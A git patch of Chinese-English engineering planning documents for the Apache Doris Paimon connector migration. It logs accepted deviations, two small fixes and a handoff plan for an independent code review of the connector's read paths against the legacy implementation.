remoteExists + `:446`);`listSupportedSysTables` 忽略 handle。无 surgical 零成本修,transient-only severity。 + - **14 accept**([DV-035]):M9.1/M9.2(前提假——连接器跑同 `CredentialUtils` 路、无 drop)、M10.1/M10.2/M10.3/M7.1(display)、M6.1/M6.2(perf)、N2.1/M3.1/N4.1/C2(text)、N3.1/M2.1(inert no-op)、M4.1/M1.3(连接器**更** correct)、M1.1(diagnostic)。 +- **否决**:M5.1 broad `getTableHandle` retype(破有意 `failAuth→empty` 契约 + 触 P3 createTable 冲突检查);M5.1 SPI no-handle `listSupportedSysTables`(surface churn + 重引 legacy「为不存在 base 表列 sys-table」quirk)。sentinel full prune-路 parity(改 shared `TablePartitionValues` 会 regress hudi;连接器对 `__HIVE_DEFAULT_PARTITION__` prune 实**更** correct)。 +- **meta**:对抗 recon 两次见效——sentinel deep-dive 的 ACCEPT 被 prune-路 skeptic 推翻为真分歧(教训:partition-null parity 必须 scan **和** prune 双路看);M5.1 的「cheap fix」被实现层核查证伪(教训:completeness critic 的 fix 建议须落到代码契约/测试层再判 effort,别照单转 FIX)。 +- **跨连接器**:accepted 项中 false-premise/display/text 多为 hudi/iceberg full-adopter 同复发,归 [DV-035] 批量考量。 + ### D-056 — `FIX-CREATE-TABLE-LOCAL-CONFLICT`(P3 揪出,MAJOR correctness)= fix-now + Option-2 外科最小修 - **日期**:2026-06-12 diff --git a/plan-doc/deviations-log.md b/plan-doc/deviations-log.md index 38c35214775493..0382fd24475b78 100644 --- a/plan-doc/deviations-log.md +++ b/plan-doc/deviations-log.md @@ -13,10 +13,11 @@ ## 📋 索引 -> 时间倒序;当前共 **32** 项。 +> 时间倒序;当前共 **33** 项。 | 编号 | 偏差主题 | 原计划位置 | 日期 | 当前状态 | |---|---|---|---|---| +| DV-035 | P4 MINOR/NIT cleanup:**15 项 accept-as-deviation**(review §5/§7,用户签字 [D-057],2026-06-12;2 项已修 = N10.1 `bcee91dcb52` + sentinel `4b2c2190dc2`,不在本条)。read-only 对抗 recon `wf_6884d37b-8ef` 逐项对当前代码复核。**(a) M5.1(FUNCTIONAL/transient-only)**:bridge `getSupportedSysTables` 经远端 handle 预探列 sys-table,`getTableHandle` swallow-非NotExist-为-empty → 瞬时 metastore blip 致已存在 sys-table 报 phantom「table not found」(legacy 静态无条件列)。**无 surgical 修**:swallow→empty 是有意+有测契约(`PaimonConnectorMetadataReadAuthTest:150` `failAuth→empty`)且共享 existence 谓词(含 P3 createTable `remoteExists`);干净修需 SPI 加法或破契约。transient-only → accept。**(b) 假前提 ×2**:M9.1(HDFS `ipc.client.fallback-to-simple-auth` 等 default「丢」)、M9.2(hive.* metastore 键推 BE)——recon 证伪:连接器 `getBackendStorageProperties` 跑**同** `CredentialUtils.getBackendPropertiesFromStorageMap` over 同 storage map,无 drop。**(c) display-only**:M10.1(CREATE 嵌套 struct comment 丢)、M10.2(read isKey=false,无 planner gate,仅 DESCRIBE)、M10.3(LTZ `WITH_TIMEZONE` extraInfo 丢,仅 DESCRIBE Extra)、M7.1(`PluginDrivenScanNode` 不 override `getDeleteFiles`+不调 super→EXPLAIN VERBOSE 缺 DV/per-backend 计账,DV 仍正确达 BE)。**(d) perf-only**:M6.1(live-Table handle cache 丢,SDK CachingCatalog 仍缓)、M6.2(schema-at-snapshot 不按 schemaId 缓,结果同仅重算)。**(e) text-only**:N2.1("Paimon"→"Plugin" 拒绝文案)、M3.1/N4.1(not-found 文案丢 earliest-snapshot hint / "Failed to get Paimon..." 前缀,条件+异常类两侧同)、C2(ALTER BRANCH/TAG 抛 `DdlException` vs `UnsupportedOperationException`,两侧都拒)。**(f) inert no-op**:N3.1(@incr 丢 `scan.snapshot-id=null` 防御性 reset,fresh base table 上 no-op)、M2.1(@incr BE-serialized table 是 incremental-window-copied,BE 只用作 read-builder/rowType 工厂、不重 plan,inert)。**(g) 连接器更 correct**:M4.1(branch schema 解析对 branch 自身 schemaManager vs legacy base 表)、M1.3(CAST 谓词不下推——除掉 legacy source-side over-prune 数据丢 bug)。**(h) diagnostic**:M1.1(`ignore_split_type` 调试 var 忽略,须 fe-core SessionVariable 类型)。跨连接器:hudi/iceberg full-adopter 多项同复发,归本条批量考量 | [task-list §P4](./task-list-P5-rereview2-fixes.md) / [D-057](./decisions-log.md) | 2026-06-12 | 🟢 已登记(accept;M5.1=transient-only FUNCTIONAL,余 display/perf/text/inert/连接器-更-correct/假前提;live-e2e 真值闸)| | DV-034 | P3-fix FIX-CREATE-TABLE-LOCAL-CONFLICT:**plugin DDL op 把 typed MySQL error-code 收敛成 generic `DdlException`**(pre-existing 跨全 4 DDL op,P4 cleanup defer)。`FIX-CREATE-TABLE-LOCAL-CONFLICT`([D-056])仅恢复 createTable 的 **case-B correctness**(local-only 冲突 + `!IF NOT EXISTS`→改抛 typed `ERR_TABLE_EXISTS_ERROR` 1050),**未** retype:**case-A**(createTable remote-hit + `!IF NOT EXISTS`)仍 fall-through 由连接器(paimon `TableAlreadyExistException`)→`DorisConnectorException`→桥 re-wrap 成 generic `DdlException`「already exists」,legacy `PaimonMetadataOps:195` 在 FE 层先抛 typed 1050;**createDatabase/dropDatabase/dropTable** 同样 `catch(Exception)`→generic `DdlException`(`PaimonConnectorMetadata:731/798/832/756`+桥 re-wrap),collapse 掉 legacy 1007/1008/1109。**非本 P3 finding**(finding=case-B silent-create correctness)、P3 audit 标 error-code parity=cosmetic/AGREE(error class + user-visible「already exists」文本两侧同、仅 numeric code 丢)。修它须每 op 在桥/连接器边界统一 typed-code 透传,属跨全 op + 跨连接器(hudi/iceberg 同)的 **P4 cleanup 批量**。真值闸=无功能影响,仅 MySQL numeric-error-code-sensitive 客户端脚本理论可感知 | [task-list §P3/§P4](./task-list-P5-rereview2-fixes.md) / [D-056](./decisions-log.md) | 2026-06-12 | 🟢 已登记(cosmetic/error-code-only,pre-existing 跨全 DDL op;P4 cleanup defer)| | DV-033 | P5-fix#9 FIX-NATIVE-SUBSPLIT:**split-weight / target-size 调度 nicety 不移植**(用户签字采纯连接器实现,2026-06-12)。legacy `fileSplitter.splitFile` 经 `splitCreator.create(...,targetFileSplitSize,...)` 在每个 `FileSplit` 上设 split weight + targetSplitSize,供 `FederationBackendPolicy` 做 backend 分配均衡。连接器 native sub-range(`buildNativeRange`)**不设** `selfSplitWeight`/targetSplitSize——但这是 **pre-existing**:翻闸后单-range native 路本就没设(`buildNativeRange` 从未设 weight,仅 JNI 路 `buildJniScanRange` 经 `computeSplitWeight` 设)。#9 **不引入**该缺口,只是把一个整文件 range 变成多个 sub-range(并行度本身已恢复,这是 #9 的目的)。纯调度均衡质量、非正确性、非并行度。连接器 SPI 无 per-range weight 喂入 FileSplit 的通道(`PaimonScanRange` 无 targetSplitSize 字段)。跨连接器:hudi/iceberg full-adopter 若要 weight-均衡可后续在 SPI/`PaimonScanRange` 加 weight 字段批量补(与既有 native-path weight 缺口一并)。真值闸=live-e2e(观察 backend 分配均衡,非正确性) | [task-list #9](./task-list-P5-rereview2-fixes.md) / [P5-fix-NATIVE-SUBSPLIT 设计](./tasks/designs/P5-fix-NATIVE-SUBSPLIT-design.md) / [D-055](./decisions-log.md) | 2026-06-12 | 🟢 已登记(perf/调度-only,pre-existing;live-e2e 真值闸)| | DV-032 | P5-fix#8 FIX-COUNT-PUSHDOWN:**collapse-to-one 丢 legacy `>10000` 并行 count-split trim**(用户签字采 collapse-to-one,2026-06-12)。legacy `PaimonScanNode:484-495` 收齐 count-eligible split 后按 `pushDownCountSum` 分流——`>COUNT_WITH_PARALLEL_SPLITS(10000)` 时 trim 到 `parallelExecInstanceNum * numBackends` 个 split 并 `assignCountToSplits` 把 total 均摊(BE 每 split CountReader 再求和回 total);`<=10000` 则 `singletonList(first)` 收一 split 携全 total。连接器**始终 collapse-to-one**(无论 countSum 大小),因连接器无 `numBackends`/`parallelExecInstanceNum`(fe-core scan-node-only,`getSplits(int numBackends)` 才有)。**纯 perf 偏差、结果恒等**:单 CountReader 在一个 fragment emit `countSum` 个空行(无 IO)而非 N 个并行——对超大 count 不并行化 count-emit。CountReader 不读数据故影响小。**未采 full-parity**(连接器发 per-split + fe-core 按 numBackends trim+redistribute)以避免把 count 语义耦进通用 `ConnectorScanRange` + 多 fe-core 代码。跨连接器:hudi/iceberg full-adopter 若要 `>10000` 并行可后续在 fe-core 加 trim hook(与 [DV-028]/[DV-030]/[DV-031]「新连接器读法 vs fe-core 既有约定」类缝同批考量)。真值闸=live-e2e(超大 PK 表 `COUNT(*)` 仍正确、仅观察 fragment 并行度差异) | [task-list #8](./task-list-P5-rereview2-fixes.md) / [P5-fix-COUNT-PUSHDOWN 设计](./tasks/designs/P5-fix-COUNT-PUSHDOWN-design.md) / [D-054](./decisions-log.md) | 2026-06-12 | 🟢 已登记(perf-only,结果恒等;live-e2e 真值闸)| @@ -56,6 +57,16 @@ ## 详细记录(时间倒序) +### DV-035 — P4 MINOR/NIT cleanup:15 项 accept-as-deviation(M5.1 transient-only + 14 display/perf/text/inert/连接器-更-correct/假前提) +- **状态**:🟢 已登记(accept)|**日期**:2026-06-12|**签字**:用户 [D-057] +- **范围**:review §5/§7 去重 ~17 项 P4 MINOR/NIT 中,2 项已修(N10.1 `bcee91dcb52`、sentinel `4b2c2190dc2`,见 [D-057]),余 15 项 accept。完整逐项分类见索引表 DV-035 行;要点: + - **M5.1(唯一 FUNCTIONAL,transient-only)**:sys-table 列举的远端 handle 预探,瞬时失败 → phantom「table not found」。**accept 理由(实现层证伪 critic 的「cheap fallback」)**:`getTableHandle` 的 swallow-非NotExist-为-empty 是有意+有测契约(`PaimonConnectorMetadataReadAuthTest:150` `failAuth→empty`)且是共享 existence 谓词(`PluginDrivenExternalCatalog:239/295/446`,含 P3 createTable remoteExists);`listSupportedSysTables` 忽略 handle。无 surgical 零成本修,唯一干净修 = SPI no-handle list(surface churn + 重引「为不存在表列 sys-table」legacy quirk)或 broad retype(破契约 + 触 P3 fix)。 + - **假前提 ×2(M9.1/M9.2)**:review 声称连接器丢 HDFS default / 推 hive.* 到 BE——recon 证伪(连接器跑同 `CredentialUtils.getBackendPropertiesFromStorageMap` over 同 storage map,无 drop;hive.* 仅 FE-side HiveConf,never location.*)。**非偏差、是 review 误判**,登记以免重复追查。 + - **其余 12**:display(M10.1/M10.2/M10.3/M7.1)、perf(M6.1/M6.2)、text(N2.1/M3.1/N4.1/C2)、inert no-op(N3.1/M2.1)、连接器**更** correct(M4.1/M1.3)、diagnostic(M1.1)。均非 correctness regression。 +- **meta**:completeness critic 的 fix 建议须落到代码契约/测试层再判 effort——M5.1 照单转 FIX 会做无 sanction 的 broad/SPI 改;实现层核查把它 flip 回 accept。 +- **跨连接器**:hudi/iceberg full-adopter 多项同复发(display/text/假前提类),将来批量 close(与 [DV-028]/[DV-030]/[DV-031]/[DV-032]/[DV-033]/[DV-034] 同批考量)。 +- **关联**:[D-057](./decisions-log.md)、[task-list §P4](./task-list-P5-rereview2-fixes.md)、recon `wf_6884d37b-8ef` + ### DV-034 — P3-fix FIX-CREATE-TABLE-LOCAL-CONFLICT:plugin DDL op typed error-code 收敛成 generic DdlException(COSMETIC/error-code-ONLY,pre-existing 跨全 DDL op) `FIX-CREATE-TABLE-LOCAL-CONFLICT`([D-056](./decisions-log.md))恢复了 createTable 的 case-B **correctness**(local-only 冲突 + `!IF NOT EXISTS` 改抛 typed `ERR_TABLE_EXISTS_ERROR` 1050),但**有意不动** error-code 残留: diff --git a/plan-doc/task-list-P5-rereview2-fixes.md b/plan-doc/task-list-P5-rereview2-fixes.md index 65d0ac6976677d..66bc17ec24ed7e 100644 --- a/plan-doc/task-list-P5-rereview2-fixes.md +++ b/plan-doc/task-list-P5-rereview2-fixes.md @@ -138,10 +138,18 @@ Legend: ⬜ todo / 🔄 in progress / ✅ done --- -## P4 — MINOR / NIT (low-priority cleanup; full list in review §5) +## P4 — MINOR / NIT cleanup — **✅ DONE** (2026-06-12; 2 fixed + 15 accepted; [D-057](./decisions-log.md) / [DV-035](./deviations-log.md)) -Bundle as one optional cleanup pass after P0–P1. Most are display-only (DESC `Key`/`Extra`/`uniqueId`, VARCHAR(65533)→STRING, EXPLAIN delete-split accounting, error-message text), perf/architectural (cache granularity), or benign. **The one with a real (rare) data edge**, worth a deliberate decision: -- Partition null-sentinel coercion: a STRING partition whose literal value is `__HIVE_DEFAULT_PARTITION__` or `\N` is coerced to NULL (connector) vs read as the literal (legacy). `PaimonScanRange.java:212-225` / `ConnectorPartitionValues.java:32-54` vs `source/PaimonScanNode.java:323-326`. +Read-only adversarial recon `wf_6884d37b-8ef` (6 parallel classifiers + 2 sentinel refutation skeptics + completeness critic) re-verified all ~17 review §5/§7 MINOR/NIT items against current code. User-signed scope ([D-057]): fix 2 actionable, accept 15. + +| item | disposition | note | +|---|---|---| +| **N10.1** VARCHAR(65533)→STRING | ✅ FIXED `bcee91dcb52` | `PaimonTypeMapping.toVarcharType` `>=65533`→`>65533` (pure connector, exact legacy parity). `PaimonTypeMappingReadTest`, 260/0/0. | +| **sentinel** partition `\N`/`__HIVE_DEFAULT_PARTITION__` scan coercion | ✅ FIXED `4b2c2190dc2` | `PaimonScanRange.populateRangeParams` derives `isNull=value==null` only (legacy `PaimonScanNode:323-326`); drops Hive-directory coercion that wrongly nulled a literal value. `ConnectorPartitionValues` untouched (hudi needs it). 5-angle adversarial review SAFE. `PaimonScanRangePartitionNullTest`, 261/0/0. | +| **M5.1** sys-table transient suppression | ⬜ ACCEPT [DV-035] | FUNCTIONAL but transient-only; `getTableHandle` swallow-to-empty is an intentional+tested contract (`failAuth→empty`) + shared existence predicate (incl. P3 createTable `remoteExists`); no surgical fix (the critic's "cheap fallback" was refuted at impl level). | +| 14 others (M9.1/M9.2 false-premise, M10.1/M10.2/M10.3/M7.1 display, M6.1/M6.2 perf, N2.1/M3.1/N4.1/C2 text, N3.1/M2.1 inert, M4.1/M1.3 connector-more-correct, M1.1 diagnostic) | ⬜ ACCEPT [DV-035] | none a correctness regression; full enumeration in [DV-035]. | + +**Adversarial recon earned its keep twice**: (1) the sentinel deep-dive's ACCEPT verdict was *refuted* by the prune-path skeptic (it had only checked the scan path; `\N` is not paimon-reserved) → converted to FIX. (2) M5.1's "cheap static fallback" (critic) was refuted at impl level (intentional tested contract) → confirmed ACCEPT. Cross-connector follow-ups (hudi/iceberg same seams) folded into [DV-035] + the existing [DV-028]…[DV-034] batch. --- From d5adb21ebe1f6165704213169f05097895b25319 Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 12 Jun 2026 14:13:24 +0800 Subject: [PATCH 036/128] docs: roll HANDOFF to round-3 clean-room adversarial review (no prior injection) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Next session = a third independent adversarial review of every paimon connector functional path (basic read, @incr, time travel, branch/tag, sys-tables, metadata cache, deletion vectors, multi-metastore, multi-storage, Parquet/ORC native read, type mapping, and a legacy-logic/fallback sweep), checking design + implementation delivery and diffing each path against the legacy datasource/paimon/* reference (kept in-tree for side-by-side). Hard constraint per user: do NOT inject accumulated development priors during the find-and-judge phase — reviewers judge from current code + legacy only; decisions-log / deviations-log / prior review reports / catalog-spi-p5-* memory are consulted ONLY in a final reconciliation phase and must not suppress a finding. B8 legacy deletion deferred until after this review. Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 76 +++++++++++++++++++++++++-------------------- 1 file changed, 43 insertions(+), 33 deletions(-) diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 6321d16d2d6c13..42fbbc17025d17 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -5,57 +5,67 @@ --- -# 🎯 下一个 session 的任务 — **P4 cleanup 全完成(2 fix + 15 accept);进入 B8 legacy 删除 或 跨连接器 follow-up 批量** +# 🎯 下一个 session 的任务 — **第三轮 clean-room 对抗 review(全功能路径,禁注入开发先验)** -第二轮 clean-room 对抗 review report:[`plan-doc/reviews/P5-paimon-rereview2-2026-06-11.md`](./reviews/P5-paimon-rereview2-2026-06-11.md)。 -👉 **任务清单:[`plan-doc/task-list-P5-rereview2-fixes.md`](./task-list-P5-rereview2-fixes.md)** —— #1~#9 + P3 + **P4 cleanup 全完成**。**无 P0/P1/P2/P3/P4 阻塞剩余。** +P0/P1/P2/P3/P4 全清(见文末「迁移完成态」)。下一步**不是**改代码,而是**重新、独立地审阅整个 paimon connector 的所有功能路径**,从**设计**与**实现交付**两个维度查问题,并**逐路径对照 legacy 旧逻辑**找差异 + 找仍走旧逻辑 / 静默 fallback 到旧逻辑的地方。 -## ✅ 本 session 完成(P4 MINOR/NIT 一次性 cleanup:2 fix + 15 accept) -P4「一次性 cleanup」:read-only 对抗 recon workflow `wf_6884d37b-8ef`(6 并行分类 agent 逐项对**当前**代码复核 + sentinel 专项 deep-dive + 2 对抗 skeptic 逐角度证伪 + completeness critic over 全批)。review §5/§7 去重 ~17 项 MINOR/NIT → 用户签字([D-057]):**fix 2 actionable + accept 15**([DV-035])。 +## ⛔ 本轮最重要的约束 — **禁止注入开发过程中的先验知识** +本轮目的就是**重新审阅**,用户明确要求**不要让历史记忆限制 review 的公正性与开放性**。因此: -- ✅ **FIX-VARCHAR-BOUNDARY(N10.1)— `bcee91dcb52`**:`PaimonTypeMapping.toVarcharType` `len>=65533`→STRING vs legacy `PaimonUtil:241` `>65533`(65533=`MAX_VARCHAR_LENGTH` 合法 exact-fit VARCHAR)。纯连接器 1 字符 `>=`→`>`,display-only/零风险 exact-parity。新 `PaimonTypeMappingReadTest` fail-before 恰 65533 红→pass-after,260/0/0、checkstyle 0、import-gate 净。 -- ✅ **FIX-PARTITION-NULL-SENTINEL(sentinel,HANDOFF 标的「唯一真实数据边」)— `4b2c2190dc2`**:scan 路 `PaimonScanRange.populateRangeParams` 经 `ConnectorPartitionValues.normalize` 施 Hive-directory 哨兵 coercion(`\N`/`__HIVE_DEFAULT_PARTITION__`→isNull)——对 hudi(path-encoded 分区)对、对 paimon 错(paimon 分区值已 typed:genuine null=Java-null,哨兵从不出现)→ literal `\N`(paimon 不保留此 token)/`__HIVE_DEFAULT_PARTITION__` 字符串分区值在 native ORC/Parquet 读被误成 SQL NULL,diverge legacy `PaimonScanNode:323-326`。**修=纯连接器** scan `isNull=value==null` only(render genuine null=""),不动 shared `ConnectorPartitionValues`(hudi `HudiScanRange:226` 仍需)。commit 前 5-angle 对抗 review SAFE。新 `PaimonScanRangePartitionNullTest` 4-case,261/0/0、checkstyle 0、import-gate 净。 -- ⬜ **15 accept([DV-035])**:**M5.1**(唯一 FUNCTIONAL,transient-only:sys-table 列举远端 handle 预探瞬时失败→phantom「table not found」;**accept** 因 `getTableHandle` swallow-to-empty 是有意+有测契约 `failAuth→empty` 且共享 existence 谓词含 P3 createTable `remoteExists`,无 surgical 修);M9.1/M9.2(**假前提**——连接器跑同 `CredentialUtils` 路无 drop);M10.1/M10.2/M10.3/M7.1(display);M6.1/M6.2(perf);N2.1/M3.1/N4.1/C2(text);N3.1/M2.1(inert no-op);M4.1/M1.3(连接器**更** correct);M1.1(diagnostic)。 +- **find-and-judge 阶段(每个路径的 reviewer 形成独立判断时):不要预读** `decisions-log.md` / `deviations-log.md` / 前两轮 review report(`reviews/P5-paimon-rereview*.md`)/ memory 里的 `catalog-spi-p5-*` result 文件 / 各 `*-design.md`。让每个 reviewer **只**从「当前 plugin connector 代码」+「legacy `datasource/paimon/*` 代码(仍在树内可 side-by-side)」独立判断。 +- **允许**提供的 = 「去哪看」的脚手架(代码包位置、构建/测试命令、import-gate 规则)——这些是**怎么做**不是**结论**。 +- **历史结论只在最终 reconciliation 阶段**(每个路径的独立 verdict 已形成**之后**)交叉核对,且**历史不得据此压制 / 推翻一个 finding**——若独立 review 与历史结论冲突,作为**新 finding 上报**让用户裁决(这正是本轮想暴露的东西:被开发先验「合理化」掉的问题)。 +- 参考既有偏好 [[clean-room-adversarial-review-pref]](多 agent 对抗 + 先 code 独立判断、后交叉核对)。 -## 🔜 下一个 session:选其一(无 P0/P1/P2/P3/P4 阻塞剩余) -1. **B8 legacy `datasource/paimon/*` 删除**(迄今每个 fix 都靠它做 side-by-side parity;P3+P4 后 parity 已全核完,可以删了)。删前确认无 live 引用(legacy `PaimonExternalTable`/`PaimonScanNode`/`PaimonUtil`/`PaimonMetadataOps`/`metacache/paimon/*` 等;注意 cutover 后 `instanceof PaimonExternalTable` 站点已 dead,但删类前 grep 全 import + GsonUtils 注册 + `getEngine`/`SPI_READY_TYPES` 成员)。 -2. **跨连接器 follow-up 批量**([DV-028]/[DV-030]/[DV-031]/[DV-032]/[DV-033]/[DV-034]/**[DV-035]**)—— hudi/iceberg full-adopter 同根因缝(mapping-flag 键、createTable-local-conflict 已经 D-056 通用关掉、error-code collapse、display/text parity、sys-table transient 等),将来批量 close。 +## 🧭 方法(对抗 review) +1. **每个路径独立 reviewer**(建议每路径 ≥1 个「实现 vs legacy 对照」reviewer),输出:设计缺陷 / 实现缺陷 / 行为差异(plugin vs legacy)/ 旧逻辑残留 or fallback。 +2. **对抗 verifier 逐 finding 证伪**(默认尝试推翻;refute 不掉才算确认)——避免「短路对≠全分支对」类误判(见过往教训:tracer PARITY 被逐分支证伪推翻)。 +3. **completeness critic** 抓漏掉的路径 / 未追的 aspect / 未核的 fallback。 +4. **最终 reconciliation**:独立 verdict 形成后,再与历史结论交叉核对,冲突项作为新 finding 上报。 +5. 输出 **`plan-doc/reviews/P5-paimon-rereview3-.md`**:逐路径 verdict + 确认 finding 表(severity / plugin-site / legacy-site / 证据);若有真分歧 → 走 per-fix 流程(`step-by-step-fix` skill)+ AskUserQuestion 定 scope。 -每条遵循 per-fix 流程(`step-by-step-fix` skill):设计 doc → 先拿当前代码复核 finding → 实现(连接器禁 import fe-core)→ build+UT(绝对 `-f`、**`-am`** 必带、读 surefire XML + `MVN_EXIT`、fail-before/pass-after)→ 独立 commit → SPI 改登 RFC + 用户签字入 decisions-log + 偏差入 deviations-log + 同步 task-list。 +## 📋 要审阅的功能路径(用户指定,逐条覆盖 + 各自对照 legacy) +1. **基础读取**(normal scan) +2. **批式增量读取**(`@incr` incremental read) +3. **Time Travel**(snapshot / timestamp / `FOR TIME AS OF` / `FOR VERSION AS OF`) +4. **Branch / Tag 读取** +5. **系统表查询**(`tbl$snapshots` 等 sys-tables) +6. **元数据缓存**(schema / table-handle / partition cache) +7. **Deletion Vector 读取**(MoR) +8. **多元数据服务接入**(filesystem / HMS / DLF / REST / JDBC flavor) +9. **多存储系统接入**(s3 / oss / cos / obs / hdfs;凭据下发 + 路径 scheme 规范化) +10. **Parquet / ORC 数据格式读取**(native reader 路 + schema-evolution / field-id) +11. **列类型映射**(read 方向 paimon→doris + write 方向 doris→paimon) +12. **旧逻辑残留 / fallback 排查**:还存在哪些可能**走旧的逻辑**,或**静默 fallback 到旧逻辑**的地方(例:`instanceof PaimonExternalTable`/`PaimonSysTable`/`PaimonSource` 等 cutover 后应 dead 的分支是否真 dead;FE 分发 switch 是否每处都有 `PLUGIN_EXTERNAL_TABLE` 臂;GsonUtils 注册;`getEngine`/`SPI_READY_TYPES` 成员;任何 `instanceof legacy-type` 或 legacy 静态调用仍可达的路径)。 -## 📋 优先级总览(详见 task-list) - -| 层 | 条目 | 说明 | -|---|---|---| -| **P0 BLOCKER** | ✅1·✅2·✅3·✅4 | **全清** | -| **P1 MAJOR** | ✅5·✅6·✅7 | **全清** | -| **P2 perf-parity** | ✅8.`FIX-COUNT-PUSHDOWN` · ✅9.`FIX-NATIVE-SUBSPLIT` | **全清** | -| **P3 覆盖缺口(去查)** | ✅ HMS-CONFRES · ✅ ANALYZE · ✅ split-count parity · ✅ DDL→`FIX-CREATE-TABLE-LOCAL-CONFLICT` `67a9b9da6e3` | **全完成** | -| **P4 MINOR/NIT** | ✅ `FIX-VARCHAR-BOUNDARY` `bcee91dcb52` · ✅ `FIX-PARTITION-NULL-SENTINEL` `4b2c2190dc2` · ⬜ 15 accept [DV-035] | **全完成**(2 fix + 15 accept;recon `wf_6884d37b-8ef`) | -| **B8 legacy 删除** | ⬜ | parity 已全核完(P3+P4),可删 `datasource/paimon/*`。 | +## 🗺️ 代码脚手架(「去哪看」,非结论) +- **Plugin connector**:`fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/`(+ `fe-connector-paimon-api` / `-backend-{filesystem,hms,aliyun-dlf,rest}`);connector-api `fe/fe-connector/fe-connector-api/`;SPI `fe/fe-connector/fe-connector-spi/`。 +- **fe-core 桥**:`fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDriven*.java` + `ConnectorColumnConverter.java`。 +- **Legacy(side-by-side 对照基准,仍在树内)**:`fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/`(`source/PaimonScanNode.java`、`PaimonExternalTable.java`、`PaimonUtil.java`、`PaimonMetadataOps.java`、`metacache/paimon/*` 等)。 +- **BE 消费端**(如需核 thrift 契约):`be/src/vec/exec/format/table/` + `be/src/format/table/`(paimon_reader / partition_column_filler / table_schema_change_helper)。 +- ⚠️ **本轮务必保留 legacy 在树内**(side-by-side 对照基准)→ **B8 legacy 删除推迟到本轮 review 之后**。 --- -# 📦 仓库状态 -- **HEAD = 本 docs 提**(更新 decisions/deviations/task-list/HANDOFF/memory)。其父 = `4b2c2190dc2`(sentinel fix)。 -- 迁移链:…→`67a9b9da6e3`(P3-fix)→`bcee91dcb52`(P4 N10.1 VARCHAR-BOUNDARY)→`4b2c2190dc2`(P4 sentinel PARTITION-NULL-SENTINEL)→**本 docs 提(HEAD)**。 +# 📦 迁移完成态 & 仓库状态 +- **HEAD = 本 docs 提**(更新 HANDOFF 为第三轮 review 任务)。迁移链:…→`67a9b9da6e3`(P3-fix)→`bcee91dcb52`(P4 N10.1)→`4b2c2190dc2`(P4 sentinel)→`af2037cf13b`(P4 docs)→**本 docs 提(HEAD)**。 +- **进度**(完整见 [task-list](./task-list-P5-rereview2-fixes.md)):P0 BLOCKER ✅1·2·3·4|P1 MAJOR ✅5·6·7|P2 perf-parity ✅8·9|P3 覆盖缺口 ✅(3 parity + 1 fix `67a9b9da6e3`)|P4 MINOR/NIT ✅(2 fix `bcee91dcb52`/`4b2c2190dc2` + 15 accept [DV-035])。**无 P0~P4 阻塞剩余。** - ⚠️ **`regression-test/conf/regression-conf.groovy` 仍 modified-未 commit 且含明文 Aliyun key** —— commit 前继续 path-whitelist,**严禁 `git add -A`**。`regression-conf.groovy.bak` 同理排除。 - scratch 仍未 commit(`.audit-scratch/` `conf.cmy/` `META-INF/`)。 - 当前分支 `catalog-spi-07-paimon`(非 `master`)。 -- **legacy `datasource/paimon/*` 仍在树内**(B8 删除未做)→ 仍可 side-by-side diff(但 P3+P4 后已无待核 parity,见上「下一步」选项 1)。 +- **legacy `datasource/paimon/*` 仍在树内**——本轮 review 的对照基准,勿删。 ## ⚠️ Commit 须知(任何 `git add` 前必读) - **硬前置**:scrub `regression-test/conf/regression-conf.groovy`(明文 Aliyun key)+ 清 scratch(`.audit-scratch/` `conf.cmy/` `META-INF/` `*.bak`)。**path-whitelist `git add`,严禁 `git add -A`。** -- 每个 fix 独立 commit;message = `fix: ` + 根因 + 解法 + 测试,末尾带 `Co-Authored-By: Claude Opus 4.8 (1M context) `。 +- 若本轮 review 转出 fix:每个 fix 独立 commit;message = `fix: ` + 根因 + 解法 + 测试,末尾带 `Co-Authored-By: Claude Opus 4.8 (1M context) `。 ## ⚙️ 操作须知(复用) - maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : **-am** -Dmaven.build.cache.enabled=false -DfailIfNoTests=false`;验证读 surefire XML + `MVN_EXIT`([[doris-build-verify-gotchas]])。改 fe-core 须单独 `-pl :fe-core -am`。**checkstyle**:连接器 `mvn -pl :fe-connector-paimon checkstyle:check`;fe-core `mvn -pl :fe-core checkstyle:check`。 - 连接器禁 import fe-core:`bash tools/check-connector-imports.sh`(仅允许 `org.apache.doris.{thrift,connector,extension,filesystem}`)。 - cwd 跨 Bash 调用持久,`cd` 破相对路径 → 一律绝对路径。 -- 测试优先 runnable FE 单测。连接器测 harness:`RecordingConnectorContext`/`RecordingPaimonCatalogOps`/`FakePaimonTable`/`PaimonScanPlanProviderTest`;P4 新增 `PaimonTypeMappingReadTest`(read-direction 类型映射)/`PaimonScanRangePartitionNullTest`(`populateRangeParams` 分区 isNull)。live-e2e CI-gated → 注明 gated,勿谎称跑过。 +- 测试优先 runnable FE 单测。连接器测 harness:`RecordingConnectorContext`/`RecordingPaimonCatalogOps`/`FakePaimonTable`/`PaimonScanPlanProviderTest`/`PaimonTypeMappingReadTest`/`PaimonScanRangePartitionNullTest`。live-e2e CI-gated(S3/OSS/REST/JDBC/Kerberos 外部 fixture,`enablePaimonTest` 默认 false)→ 注明 gated,勿谎称跑过。 -## 🧠 给下一个 agent 的 meta -- **P4 recon 模式(对抗 recon 两次见效)**:read-only 分类 workflow(多并行 classifier 逐项对**当前**代码复核 + 专项 deep-dive + 对抗 skeptic 逐角度证伪 + completeness critic)→ 真分歧 / 假前提区分 → AskUserQuestion 定 scope → 转 FIX 或 accept。**(1) sentinel deep-dive 的 ACCEPT 被 prune-路 skeptic 推翻**为真分歧(教训:partition-null parity 必须 scan **和** prune 双路看,`\N` 非 paimon-保留 token)。**(2) M5.1 的「cheap static fallback」(completeness critic) 被实现层核查证伪**——swallow-to-empty 是有意+有测契约 → flip 回 accept(教训:critic 的 fix 建议须落到代码契约/测试层再判 effort,别照单转 FIX)。 -- **sentinel fix 关键**:`ConnectorPartitionValues` 是 shared API(paimon+hudi),hudi path-encoded 分区**需要** Hive 哨兵 coercion,故修必须 paimon-local(不动 